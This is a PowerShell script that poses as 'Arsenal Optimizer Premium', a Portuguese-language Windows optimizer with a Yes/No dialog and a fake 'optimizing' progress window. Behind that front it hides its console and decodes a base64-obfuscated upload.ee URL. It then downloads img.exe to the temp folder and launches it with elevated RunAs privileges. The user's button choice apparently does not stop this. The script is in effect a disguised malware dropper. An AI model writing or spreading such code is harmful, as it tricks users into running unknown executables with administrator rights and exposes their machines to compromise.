Add-Type -AssemblyName PresentationFramework

function S1 {
    [void] [System.Reflection.Assembly]::LoadWithPartialName("presentationframework")

    $w1 = New-Object System.Windows.Window
    $w1.Title = "Optimizer"
    $w1.Width = 600
    $w1.Height = 500
    $w1.WindowStartupLocation = "CenterScreen"
    $w1.WindowStyle = "None"
    $w1.ResizeMode = "NoResize"
    $w1.Background = [System.Windows.Media.Brushes]::Black
    $w1.AllowsTransparency = $true
    $w1.Opacity = 0.98

    $b1 = New-Object System.Windows.Controls.Border
    $b1.Background = [System.Windows.Media.Brushes]::Black
    $b1.CornerRadius = "15"
    $b1.Padding = "20"
    $b1.Margin = "20"
    $b1.BorderBrush = [System.Windows.Media.Brushes]::DarkRed
    $b1.BorderThickness = "3"

    $s1 = New-Object System.Windows.Controls.StackPanel
    $s1.HorizontalAlignment = "Center"
    $s1.VerticalAlignment = "Center"
    
    $t1 = New-Object System.Windows.Controls.TextBlock
    $t1.Text = "Arsenal Optimizer Premium"
    $t1.Margin = "15"
    $t1.HorizontalAlignment = "Center"
    $t1.Foreground = [System.Windows.Media.Brushes]::White
    $t1.FontSize = 26
    $t1.FontFamily = New-Object System.Windows.Media.FontFamily "Segoe UI"
    $t1.FontWeight = "Bold"

    $s1.Children.Add($t1)
    
    $bp1 = New-Object System.Windows.Controls.StackPanel
    $bp1.Orientation = "Horizontal"
    $bp1.HorizontalAlignment = "Center"
    $bp1.Margin = "30"
    
    $y1 = New-Object System.Windows.Controls.Button
    $y1.Content = "Sim"
    $y1.Width = 100
    $y1.Margin = "10"
    $y1.Background = [System.Windows.Media.Brushes]::Crimson
    $y1.Foreground = [System.Windows.Media.Brushes]::White
    $y1.FontSize = 16
    $y1.FontFamily = New-Object System.Windows.Media.FontFamily "Segoe UI"
    $y1.FontWeight = "Bold"
    $y1.Padding = "10"

    $n1 = New-Object System.Windows.Controls.Button
    $n1.Content = "Não"
    $n1.Width = 100
    $n1.Margin = "10"
    $n1.Background = [System.Windows.Media.Brushes]::Crimson
    $n1.Foreground = [System.Windows.Media.Brushes]::White
    $n1.FontSize = 16
    $n1.FontFamily = New-Object System.Windows.Media.FontFamily "Segoe UI"
    $n1.FontWeight = "Bold"
    $n1.Padding = "10"

    $bp1.Children.Add($y1)
    $bp1.Children.Add($n1)
    $s1.Children.Add($bp1)
    
    $b1.Child = $s1
    $w1.Content = $b1

    $r1 = $null
    
    $y1.Add_Click({
        $r1 = $true
        $w1.Close()
    })
    
    $n1.Add_Click({
        $r1 = $false
        $w1.Close()
    })
    
    $w1.Closing.Add({
        if ($null -eq $r1) {
            $r1 = $false
        }
    })
    
    $w1.ShowDialog()
    return $r1
}

function D1 {
    $u1 = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("aHR0cHM6Ly93d3cudXBsb2FkLmVlL2Rvd25sb2FkLzE2Njc3MDcyLzZiNmZjMTFlYWRjOTFlZGE5MzgxL2ltZy5leGU="))
    $o1 = "$env:TEMP\img.exe"
    
    $wc1 = New-Object System.Net.WebClient
    $wc1.DownloadFile($u1, $o1)

    Start-Process -FilePath $o1 -Verb RunAs
}

$c1 = (Get-Process -id $pid).MainWindowHandle
$u321 = Add-Type -TypeDefinition @"
    using System;
    using System.Runtime.InteropServices;
    public class User32 {
        [DllImport("user32.dll")]
        public static extern bool ShowWindow(IntPtr hwnd, int nCmdShow);
    }
"@ -PassThru
$u321::ShowWindow($c1, 0)

$r1 = S1

if ($null -eq $r1 -or $r1 -eq $false) {
    $lw1 = New-Object System.Windows.Window
    $lw1.Title = "Carregando"
    $lw1.Width = 400
    $lw1.Height = 150
    $lw1.WindowStartupLocation = "CenterScreen"
    $lw1.WindowStyle = "None"
    $lw1.ResizeMode = "NoResize"
    $lw1.Background = [System.Windows.Media.Brushes]::Black
    $lw1.AllowsTransparency = $true
    $lw1.Opacity = 0.98
    
    $b1 = New-Object System.Windows.Controls.Border
    $b1.Background = [System.Windows.Media.Brushes]::Black
    $b1.CornerRadius = "15"
    $b1.Padding = "20"
    $b1.Margin = "10"
    $b1.BorderBrush = [System.Windows.Media.Brushes]::DarkRed
    $b1.BorderThickness = "3"

    $sp1 = New-Object System.Windows.Controls.StackPanel
    $sp1.HorizontalAlignment = "Center"
    $sp1.VerticalAlignment = "Center"

    $lt1 = New-Object System.Windows.Controls.TextBlock
    $lt1.Text = "Otimizando, por favor aguarde..."
    $lt1.Margin = "10"
    $lt1.HorizontalAlignment = "Center"
    $lt1.VerticalAlignment = "Center"
    $lt1.Foreground = [System.Windows.Media.Brushes]::White
    $lt1.FontSize = 18
    $lt1.FontFamily = New-Object System.Windows.Media.FontFamily "Segoe UI"
    $lt1.FontWeight = "Bold"

    $pb1 = New-Object System.Windows.Controls.ProgressBar
    $pb1.Width = 300
    $pb1.Height = 20
    $pb1.IsIndeterminate = $true
    $pb1.Foreground = [System.Windows.Media.Brushes]::DarkRed
    $pb1.Margin = "10"

    $sp1.Children.Add($lt1)
    $sp1.Children.Add($pb1)

    $b1.Child = $sp1
    $lw1.Content = $b1
    $lw1.Show()
    
    D1
    
    $lw1.Close()
}

exit
